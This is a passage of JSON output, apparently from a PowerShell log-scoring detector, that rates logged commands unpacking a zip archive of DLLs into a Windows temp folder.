"detect_sign": 0, "logistic_reg": 67.02596314275281, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Add-Type): \"Add-Type\"\nParameterBinding(Add-Type): name=\"AssemblyName\"; value=\"System.IO.Compression\"\n", "removed_backtick": "CommandInvocation(Add-Type): \"Add-Type\"\nParameterBinding(Add-Type): name=\"AssemblyName\"; value=\"System.IO.Compression\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6702596314275281, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181139", "time": {"SystemTime": "2024-10-18T10:27:45.8676324Z"}, "totalscore": {"totalscore": 65.50039672640003, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 65.50039672640003, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Add-Type): \"Add-Type\"\nParameterBinding(Add-Type): name=\"AssemblyName\"; value=\"System.IO.Compression.FileSystem\"\n", "removed_backtick": "CommandInvocation(Add-Type): \"Add-Type\"\nParameterBinding(Add-Type): name=\"AssemblyName\"; value=\"System.IO.Compression.FileSystem\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6550039672640002, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181141", "time": {"SystemTime": "2024-10-18T10:27:45.8680056Z"}, "totalscore": {"totalscore": 50.30973943388866, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 50.30973943388866, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Add-CompressionAssemblies): \"Add-CompressionAssemblies\"\n", "removed_backtick": "CommandInvocation(Add-CompressionAssemblies): \"Add-CompressionAssemblies\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5030973943388866, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": 
"1181142", "time": {"SystemTime": "2024-10-18T10:27:45.8749806Z"}, "totalscore": {"totalscore": 80.75512775529677, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 80.75512775529677, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileStream\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip, Open, Read\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileStream\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip, Open, Read\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8075512775529676, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181143", "time": {"SystemTime": "2024-10-18T10:27:45.9442231Z"}, "totalscore": {"totalscore": 84.46197927656343, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 84.46197927656343, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.Compression.ZipArchive\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"System.IO.FileStream, Read, False\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.Compression.ZipArchive\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"System.IO.FileStream, Read, False\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8446197927656343, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181144", "time": {"SystemTime": 
"2024-10-18T10:27:46.1147945Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avcodec-57.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avcodec-57.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181145", "time": {"SystemTime": "2024-10-18T10:27:46.2219799Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avcodec-57.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avcodec-57.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181146", "time": {"SystemTime": "2024-10-18T10:27:46.2309285Z"}, "totalscore": {"totalscore": 
52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181147", "time": {"SystemTime": "2024-10-18T10:27:46.7615391Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avcodec-57.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avcodec-57.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181149", "time": {"SystemTime": "2024-10-18T10:27:47.1244155Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": 
"CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"0\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"0\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181151", "time": {"SystemTime": "2024-10-18T10:27:47.1250381Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; 
value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181152", "time": {"SystemTime": "2024-10-18T10:27:47.1262342Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avfilter-6.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avfilter-6.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181153", "time": {"SystemTime": "2024-10-18T10:27:47.1294613Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): 
name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avfilter-6.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avfilter-6.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181154", "time": {"SystemTime": "2024-10-18T10:27:47.1375630Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181155", "time": {"SystemTime": "2024-10-18T10:27:47.1560290Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 
'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avfilter-6.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avfilter-6.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181157", "time": {"SystemTime": "2024-10-18T10:27:47.2513289Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"0\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"0\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181159", "time": {"SystemTime": "2024-10-18T10:27:47.2517619Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": 
"CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"2\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"2\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181160", "time": {"SystemTime": "2024-10-18T10:27:47.2523081Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avformat-57.dll\"\n", "removed_backtick": 
"CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avformat-57.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181161", "time": {"SystemTime": "2024-10-18T10:27:47.2529487Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avformat-57.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avformat-57.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181162", "time": {"SystemTime": "2024-10-18T10:27:47.2538585Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): 
\"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181163", "time": {"SystemTime": "2024-10-18T10:27:47.3998563Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avformat-57.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avformat-57.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181165", "time": {"SystemTime": "2024-10-18T10:27:47.5836050Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): 
name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181167", "time": {"SystemTime": "2024-10-18T10:27:47.5840730Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"3\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): 
name=\"currentEntryCount\"; value=\"3\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181168", "time": {"SystemTime": "2024-10-18T10:27:47.5860230Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avutil-55.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"avutil-55.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181169", "time": {"SystemTime": "2024-10-18T10:27:47.5868140Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avutil-55.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avutil-55.dll\"\n", "error": {}, "detect_iex": false, 
"url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181170", "time": {"SystemTime": "2024-10-18T10:27:47.5875825Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181171", "time": {"SystemTime": "2024-10-18T10:27:47.6213761Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avutil-55.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\avutil-55.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181173", "time": {"SystemTime": 
"2024-10-18T10:27:47.7944931Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181175", "time": {"SystemTime": "2024-10-18T10:27:47.7949548Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' 